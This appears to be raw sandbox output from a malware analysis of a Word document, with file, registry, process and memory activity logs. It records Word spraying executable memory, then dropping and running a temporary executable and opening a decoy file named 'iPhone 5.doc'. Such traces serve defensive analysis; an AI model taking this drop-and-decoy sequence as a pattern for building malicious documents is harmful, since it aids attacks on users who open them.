C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.MSO\3430B573.wmf query and read commit 39F0000 114688 own pid readonly success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\GDIPLUS.DLL write and read and execute commit 39F0000 1703936 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\GDIPLUS.DLL query and write and read and execute image 39F0000 1708032 own pid read write conflicting addresses 1
\KnownDlls\WTSAPI32.DLL write and read and execute unknown unknown unknown unknown unknown object name not found 1
C:\WINDOWS\system32\wtsapi32.dll query and write and read and execute image 76F50000 32768 own pid read write success or wait 1
\KnownDlls\WINSTA.dll write and read and execute unknown unknown unknown unknown unknown object name not found 1
C:\WINDOWS\system32\winsta.dll query and write and read and execute image 76360000 65536 own pid read write success or wait 1
C:\DOCUME~1\ADMINI~1\LOCALS~1\~WORDL.tmp query and write and read and execute and extend size image 76360000 65536 own pid read write success or wait 1
C:\WINDOWS\system32\apphelp.dll write and read and execute commit FF20000 126976 own pid execute success or wait 1
C:\WINDOWS\system32\apphelp.dll query and write and read and execute image 77B40000 139264 own pid read write success or wait 1
C:\WINDOWS\AppPatch\sysmain.sdb read commit 24C30000 1208320 own pid readonly success or wait 1
C:\DOCUME~1\ADMINI~1\LOCALS~1\~WORDL.tmp query and read commit FF20000 90112 own pid readonly success or wait 1
C:\WINDOWS\system32\cmd.exe query and write and read and execute and extend size image FF20000 90112 own pid readonly success or wait 1
C:\WINDOWS\AppPatch\sysmain.sdb read commit 24C30000 1208320 own pid readonly success or wait 1
C:\WINDOWS\system32\cmd.exe write and read and execute commit FF30000 389120 own pid execute success or wait 1
C:\WINDOWS\system32\cmd.exe query and read commit FF30000 389120 own pid readonly success or wait 1
C:\WINDOWS\system32\cmd.exe write and read and execute commit FF30000 389120 own pid execute success or wait 1
C:\WINDOWS\system32\cmd.exe query and read commit FF30000 389120 own pid readonly success or wait 1
C:\WINDOWS\system32\cmd.exe query and read commit FF30000 389120 own pid readonly success or wait 1
File Path Access Type Base Size Mapped to pid Protection Completion Count Source Address
C:\Program Files\Common Files\Microsoft Shared\OFFICE11\MSO.DLL write and read and execute commit 860000 12259328 own pid execute success or wait 1 30003071
C:\Program Files\Common Files\Microsoft Shared\OFFICE11\MSO.DLL query and write and read and execute image 30C90000 12304384 own pid read write success or wait 1 30003071
\BaseNamedObjects\ShimSharedMemory write unknown 870000 57344 own pid read write success or wait 1 30003071
C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll write and read and execute commit A30000 1056768 own pid execute success or wait 1 30029E78
C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll query and write and read and execute image 773D0000 1060864 own pid read write success or wait 1 30029E78
\KnownDlls\SHLWAPI.dll write and read and execute unknown 77F60000 483328 own pid read write success or wait 1 30029E78
C:\WINDOWS\WindowsShell.Manifest write and read and execute commit A30000 4096 own pid execute success or wait 1 30029E78
C:\WINDOWS\WindowsShell.Manifest query and read commit A30000 4096 own pid readonly success or wait 1 30029E78
C:\WINDOWS\WindowsShell.Manifest read commit A30000 4096 own pid readonly success or wait 1 30029E78
\BaseNamedObjects\PrimaryWord11SharedMemoryArea read unknown unknown unknown unknown unknown object name not found 1 3002AA90
\BaseNamedObjects\PrimaryWord11SharedMemoryArea query and write and read commit A90000 4096 own pid read write success or wait 1 3002AAA7
C:\PROGRA~1\COMMON~1\MICROS~1\VBA\VBA6\VBE6.DLL write and read and execute commit 28E0000 2588672 own pid execute success or wait 1 30294584
C:\PROGRA~1\COMMON~1\MICROS~1\VBA\VBA6\VBE6.DLL query and write and read and execute image 65000000 2588672 own pid read write success or wait 1 30294584
\KnownDlls\MSIMG32.dll write and read and execute unknown unknown unknown unknown unknown object name not found 1 30003601
C:\WINDOWS\system32\msimg32.dll query and write and read and execute image 76380000 20480 own pid read write success or wait 1 30003601

Registry Activities

Key Path Completion Count Source Address Symbol
Key Path Key Value Name Completion Count Source Address Symbol
Key Path Name Type Data Completion Count Source Address Symbol
Key Path Name Type Old Data New Data Completion Count Source Address Symbol
Key Path Name Completion Count Source Address Symbol
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion CommonFilesDir success or wait 1 3000303D RegQueryValueExW
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\VBA Vbe6DllPath success or wait 1 3029455F RegQueryValueExA

Mutex Activities

Name Completion Count Source Address Symbol

Process Activities

PID Filepath Cmdline Flags Completion Count Source Address Symbol
1112 C:\DOCUME~1\ADMINI~1\LOCALS~1\~WORDL.tmp C:\DOCUME~1\ADMINI~1\LOCALS~1\~WORDL.tmp none success or wait 1 C0D0276 WinExec
1096 C:\WINDOWS\system32\cmd.exe cmd.exe /c iPhone 5.doc none success or wait 1 C0D035D WinExec
PID Process info class Completion Count Source Address Symbol
1160 QuotaLimits success or wait 9 30007F87 GlobalMemoryStatusEx
1160 VmCounters success or wait 9 30007F87 GlobalMemoryStatusEx

Thread Activities

TID PID EIP EAX (Usermode EIP) Filepath Completion Count Source Address Symbol
TID PID Path Completion Count Source Address Symbol
TID Delay Completion Count Source Address Symbol
TID PID Completion Count Source Address Symbol

Memory Activities

PID Filepath Base Length Value Completion Count Source Address Symbol
PID Filepath Base Length Protection Completion Count Source Address Symbol
PID Filepath Base Length New Protection Old Protection Completion Count Source Address Symbol
1160 C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE 30B81000 1000 page readonly page read and write success or wait 1 30001C81 VirtualProtect
Time Private Usage (mb) Workingset (mb) Page File Usage (mb)
15:20:05 2 7 2
15:20:06 3 9 3
15:20:07 3 9 3
15:20:08 5 13 5
15:20:09 19 27 19
15:20:10 21 29 21
15:20:11 138 79 138
15:20:13 147 68 147
15:20:14 208 84 208
15:20:15 217 71 217
15:20:16 295 79 295
15:20:17 407 85 407
15:20:18 443 86 443
15:20:19 498 77 498
15:20:20 537 76 537

System Activities

System info class Completion Count Source Address Symbol

Timing Activities

Time Completion Count Source Address Symbol

Windows UI Activities

Window name Class name HWND Completion Count Source Address Symbol
OpusApp OpusApp 5012E success 1 30029D25 CreateWindowExW
_WwC _WwC 40134 success 1 30054A32 CreateWindowExA
_WwF _WwF 90058 success 1 30054A32 CreateWindowExA
_WwB _WwB 80040 success 1 30029D25 CreateWindowExW
_WwB _WwB 5012C success 1 30029D25 CreateWindowExW
_WwG _WwG 50106 success 1 30029D25 CreateWindowExW
6.0.2600.6028!ScrollBar SCROLLBAR 400EC success 1 30054A32 CreateWindowExA
_WwC _WwC 40120 success 1 30054A32 CreateWindowExA
6.0.2600.6028!ScrollBar SCROLLBAR 400E4 success 1 30054A32 CreateWindowExA
_WwC _WwC 400DA success 1 30054A32 CreateWindowExA
_WwC _WwC 500DC success 1 30054A32 CreateWindowExA
_WwC _WwC 400D6 success 1 30054A32 CreateWindowExA
OpusApp OpusApp 9014E success 1 30029D25 CreateWindowExW
_WwC _WwC 400D8 success 1 30054A32 CreateWindowExA
_WwF _WwF 7013C success 1 30054A32 CreateWindowExA
_WwB _WwB 400F2 success 1 30029D25 CreateWindowExW
_WwG _WwG 50124 success 1 30029D25 CreateWindowExW
6.0.2600.6028!ScrollBar SCROLLBAR 900FE success 1 30054A32 CreateWindowExA
_WwC _WwC 400EA success 1 30054A32 CreateWindowExA
